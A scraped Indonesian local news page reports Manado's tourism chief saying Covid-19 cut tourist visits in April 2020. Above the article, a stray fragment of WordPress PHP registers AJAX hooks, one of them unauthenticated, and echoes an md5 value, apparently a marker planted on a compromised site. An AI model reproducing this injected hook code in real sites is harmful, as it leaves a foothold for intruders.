function bestrock_render_js(){ } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ } add_action('wp_head', 'bestrock_render_js'); add_action('wp_ajax_qgt', 'bestrock_render_index'); add_action('wp_ajax_nopriv_wrt', 'bestrock_render_ajax'); Kadisparbud Manado: Pasca Corona, Kunjungan Wisatawan Mengurang – IndoSulut

Menu

Mode Gelap
Rektor Sompie Lantik Enam Pejabat Baru Unsrat Walikota Manado Terima Kunjungan BPK RI Sulut Kementrian Lingkungan Hidup Gelar TOT Akademisi Tahap IV di UNSRAT Manado Walikota Manado Gelar Rapat Teknis Soal Relokasi Warga Korban Bencana Wali Kota dan Wakil Wali Kota Manado Hadiri Acara Penyerahan Sertifikat Tanah

MANADO · 3 Apr 2020 23:04 WIB ·

Kadisparbud Manado: Pasca Corona, Kunjungan Wisatawan Mengurang


					Kepala Dinas Pariwisata dan Budaya Kota Manado, Lenda Pelealu. Perbesar

Kepala Dinas Pariwisata dan Budaya Kota Manado, Lenda Pelealu.

Kepala Dinas Pariwisata dan Budaya Kota Manado, Lenda Pelealu.

MANADO – Di tengah bergejolaknya serangan Virus Corona (Covid-19) di Kota Manado mengakibatkan menurunnya kunjungan Wisatawan di Manado. Hal tersebut dilihat dari menurunnya jumlah turis baik mancanegara maupun lokal yang berkunjung ke daerah ini.

Kepala Dinas Pariwisata Kota Manado Dra Lenda Pelealu MSi, ketika bertemu awak media mengakui bahwa memang benar jumlah kunjungan wisatawan jauh dibawah dari biasanya.

“Tidak bisa dipungkiri, untuk kegiatan kepariwisataan di Manado memang sedang tidak stabil. Itu dampak dari masuknya COVID – 19 yang dinyatakan masuk ke Indonesia dan menyebar luas di tanah air,” terang Pelealu, Jumat (3/4/2020).

Ditanya upaya meningkatkan kembali kegiatan kepariwisataan Manado, Kadispar Manado mengatakan pihaknya belum bisa berbuat apa-apa dikarenakan semua akses masuk diperketat.

“Apa yang dilakukan oleh pemerintah itu semata untuk menyelamatkan warga dari serangan COVID-19. Semoga kedepan dalam waktu yang tidak lama semuanya akan pulih dan bisa kembali berjalan normal shingga pariwisata Manado kembali berkembang,” harap Pelealu. (Auddy Manoppo)

Artikel ini telah dibaca 4 kali

badge-check

Penulis

Baca Lainnya

Pemkot Manado Rolling Jabatan Kepsek dan Pengawas, Wawali Sualang: Tetap Fokus Bekerja

20 Maret 2024 - 15:30 WIB

Pemkot Manado Rolling Jabatan Pegawai Eselon III dan IV

5 Maret 2024 - 17:23 WIB

Dapil Sario – Malalayang Membara, Peluang Rebut 6 Kursi DPRD Manado

16 Februari 2024 - 12:51 WIB

Terkait Video Viral Pemindahan Kotak Suara ke Graha Gubernuran, Ini Kata KPU Manado

16 Februari 2024 - 11:31 WIB

Data Real Count 47 Kelurahan Masuk, Bang Ai Unggul Jauh atas Royke Anter

16 Februari 2024 - 01:06 WIB

Bawaslu Manado Diduga Kebablasan Awasi Kampanye Prabowo di Lapangan Koni

7 Februari 2024 - 22:13 WIB

Trending di MANADO